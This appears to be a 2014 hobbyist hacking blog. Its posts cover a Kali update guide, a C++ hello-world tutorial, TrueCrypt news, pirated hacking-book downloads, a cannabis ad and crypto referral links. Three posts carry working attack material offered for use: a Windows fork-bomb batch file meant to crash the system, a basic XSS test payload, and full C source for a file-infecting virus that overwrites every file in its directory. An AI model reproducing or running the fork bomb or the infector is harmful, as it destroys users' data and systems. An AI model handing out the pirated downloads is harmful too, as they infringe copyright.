Monday, September 22, 2014

how to make a batch file to crash windows

here is the "code"
%0|%0
paste that in a notepad and save it as whateveryou want.bat for example

lol.bat

by running this it will cause windows to lag out and crash.

Saturday, September 20, 2014

Metasploit for windows

Hey everyone most people don't know that metasploit which is developed by rapid7 is able to be used on many different operating systems. so I am going to give you guys the download link for that.
Hope this was useful
http://adf.ly/sEIpg


Also wanted to give a mention for the information from The Bakery Cannabis Store about the best weed strains. Their article has a lot of good options to choose the best weed and edibles.

The Bakery Cannabis Store
3060 Dundas St W, Toronto, ON M6P 1Z7 
(647)-349-9333

https://thebakerycannabis.ca/3best-weed-strains-that-can-change-your-day/



How to perform a cross site scripting attack

Hey guys this is a tutorial on css or cross site scripting I am not going to go in depth on how the attack works but I will give you the basic idea of in what situation you could use it in. So for example the comments section below every post on my website could possibly be vulnerable (but it is not) but to test it instead of just regularly posting a comment you would attempt to post some code e it HTML or JavaScript. My first example would be trying to post html in the comment here is my example. <h1> Hello </h1>

If the comment gets submitted and it does get put in as a header 1 size font then the site is css vulnerable. The next thing you would do is put in some JavaScript. Here is my JavaScript example.
<script>alert(hello);</script>
If this goes through then having a basic knowledge of JavaScript is all that is need to do whatever you please with this victims website.

Please remember this is illegal to perform without permission so use this knowledge wisely.
Hope you guys like this tutorial.


Wednesday, September 17, 2014

How to make a worm in C by alexthed4rk

So my friend alexthed4rk gave me this code it is written in C hope you guys like it.

#include<stdio.h>
#include<io.h>
#include<dos.h> //Windows Only 
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
//LOL

how to update kali linux

Hey guy this is just a basic how to on updating kali linux. I will do more of these soon hope you enjoy.

step 1. you should boot up kali linux and the open a terminal.



step 2. enter apt-get update && apt-get upgrade in the terminal and hit enter.

Step 2

Then let it update it can take up to 10 minutes but it can vary on different internet speeds.

Let me know if you found this useful by giving this a like or a tweet I would appreciate it.

Sunday, August 10, 2014

How to make your first program in C ++

Hey guys today I am going to run you through making a basic hello world program using codeblocks.
So for those of you who do not know what C ++ is it is a programming language and in my opinion I find it to be very useful.

Step 1 download codeblocks: codeblocks is a opensource IDE which will allow us to build our program. You can download it from here: http://adf.ly/r0y85

Step 2 making a project: once you download and install the program you want to click the make a new project button . (Also when you are going through the project detail you want to select a console program as the program type, C++ as the language and GNU GCC Compiler as your compiler.)




Step 3 compiling the program: So by the time you complete the steps the code should look like the image below.


Step 4 build and run the program by now all you have to do is build and run the program and to do this you must click the arrow with the gear on the toolbar or hit F9 to do so, it should end up looking like this.


Hope you like this tutorial and sorry for the wait but I just got back from summer break I will be doing more daily tutorials if you have any requests please put them in the comments below.

Saturday, June 14, 2014

TrueCrypt, the popular and reputed open source file and disk encryption Software for Windows, OSX and Linux, has abruptly closed down Wednesday recommending its users to use Microsoft's Bitlocker.

TrueCrypt is a free, open-source and cross-platform encryption program, thereby one of the world's most-used encryption tool, trusted by tens of millions of users and recommended by NSA whistleblowerEdward Snowden.

TRUECRYPT IS NOT SECURE
On Wednesday afternoon, the users of TrueCrypt encryption tool redirected to the project's officialSourceForge-hosted page that displays a mysterious security warning message that the popular encryption tool has been discontinued and that users should switch to an alternative.

The official website for the TrueCrypt software warns the user that the open source encryption software is no longer secure and informs that the development of the software has been terminated.

At the top of TrueCrypt page on SourceForge displays a text in red colour that states, “WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues.
The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP. Windows 8/7/Vista and later offer integrated support for encrypted disks and virtual disk images. Such integrated support is also available on other platforms (click here for more information). You should migrate any data encrypted by TrueCrypt to encrypted disks or virtual disk images supported on your platform,” Truecrypt website warned.
WEBSITE HIJACKED ? SUGGESTING TO USE BITLOCKER!
The encryption software abruptly ended its support without providing any explanation from its developers side and recommended Microsoft's BitLocker as an alternative for Windows users, along with a detailed guide on how to migrate your encrypted data to BitLocker instead.

Now, this sudden security warning and suggesting Microsoft’s Bitlocker as an alternate raise many questions. Many people around the web have assumed that some hacker has compromised the SourceForge account of TrueCrypt, but yet it’s quite unclear whether it’s a defacement of the site or something controversial. Otherwise why the developers of free and open source encryption tool provider would recommend its users to switch on to the most controversial Microsoft’s Bitlocker drive encryption tool.
truecrypt warning
It could be possible that the developers of the TrueCrypt may be aware of some critical vulnerability or backdoor that according to them would imperil the integrity of the reputed software, which has been downloaded more than 28 million times. Some other possibilities could be:
  • Government or Intelligence Agency forced the developers to include a backdoor for them, but they refused and shut it down like Lavabit encrypted email service.
  • Someone hijacked the website and Crypto keys to raise false alarms.
Matthew Green, who is a professor specializing in cryptography at Johns Hopkins University and also involved with the TrueCrypt audit, tweeted that he believes that the announcement is a legitimate exit on the part of the developer, and not a hack.

Significantly, the current version listed on the SourceForge page, version 7.2, was signed yesterday with the official TrueCrypt private signing key, the same key used by the TrueCrypt Foundation for as long as two years. This means the warning on the official homepage of TrueCrypt isn't a hoax posted by some hacker or cyber criminal.

Friday, May 23, 2014

I am giving away Fedoracoins!

I have a decent amount of Fedoracoins and if you want to get some send me your wallet address sen it to this email you can email me at: computersrule12@gmail.com , if you don't have a Fedoracoin wallet yet you can download one from here: http://coin-ads.com/BvezyU I would appreciate it if you like this article after I send you some.
Thanks 

Wednesday, May 21, 2014

Top three books to learn to Hack

1.
Kali Linux although it sounds like slang for California, Kali through the 

phases of the penetration testing life cycle; one major tool from each phase

 is explained. The book culminates with a chapter on reporting that will 
provide examples of documents used prior to, during and after the pen test. To buy it click the image on the right and to download the pdf click the download button below. 

This guide will benefit information security professionals of all levels, hackers, systems administrators, network administrators, and beginning and intermediate professional pen testers, as well as students majoring in information security.
 

or download here: http://coin-ads.com/vLdVpD

2.
So there is an amazing book on hacking in assembly and C it come with a live cd it is called Hacking the art of penetration it can be purchased by searching for it on Google or you can download the ebook and the live CD below the CD download is a torrent you will need a torrent client to download it.

 Torrent for live CD


ebook
3.

Python Programming for Hackers and Reverse Engineers (Download)

Python is fast becoming the programming language of choice for hackers, reverse engineers, and software testers because it’s easy to write quickly, and it has the low-level support and libraries that make hackers happy. But until now, there has been no real manual on how to use Python for a variety of hacking tasks. You had to dig through forum posts and man pages, endlessly tweaking your own code to get everything working. Not anymore.
ghp1Gray Hat Python explains the concepts behind hacking tools and techniques like debuggers, trojans, fuzzers, and emulators. But author Justin Seitz goes beyond theory, showing you how to harness existing Python-based security tools – and how to build your own when the pre-built ones won’t cut it.
You’ll learn how to:
·        Automate tedious reversing and security tasks
·        Design and program your own debugger
·        Learn how to fuzz Windows drivers and create powerful fuzzers from scratch
·        Have fun with code and library injection, soft and hard hooking techniques, and other software trickery
·        Sniff secure traffic out of an encrypted web browser session
·        Use PyDBG, Immunity Debugger, Sulley, IDAPython, PyEMU, and more

Most of the worlds best hackers are using python to do their handiwork so I would suggest that you learn this language to buy the book click the image above to download the pdf click the download button down below.

Hope you guys liked this post please like subscribe and follow

Tuesday, May 20, 2014

I am thinking of writing a book let me know what you think.

Hey guys, I am writing a book on tutorials on hacking and computers. If you have any ideas that I should know about do not hesitate to email me at computersrule12@gmail.com . If you want to write part of it contact me if you are interested in donating I would be willing to give back a share of the profits in appreciation. You can donate by clicking the donate button on the right side of the page if you want me to write it but don't want to invest please hit that +1  if you support it anyways thanks.

Free bitcoins

Hey guys sorry for the wait I am busy with exams, but I wanted to give you guys something in the meantime so here it is. Bitcoins if you haven't heard of them yet are a crypto currency most people mine these with miners you used to be able to mine them with GPUs but it is no longer profitable. The good thing is they are still worth a decent amount of money I believe currently it is a couple hundred dollars per bitcoin. This site will give you parts of these coins. If you want to get started just click the link below to get started.


Thanks

http://freebitco.in/?r=495388

how to make a batch file to crash windows

here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...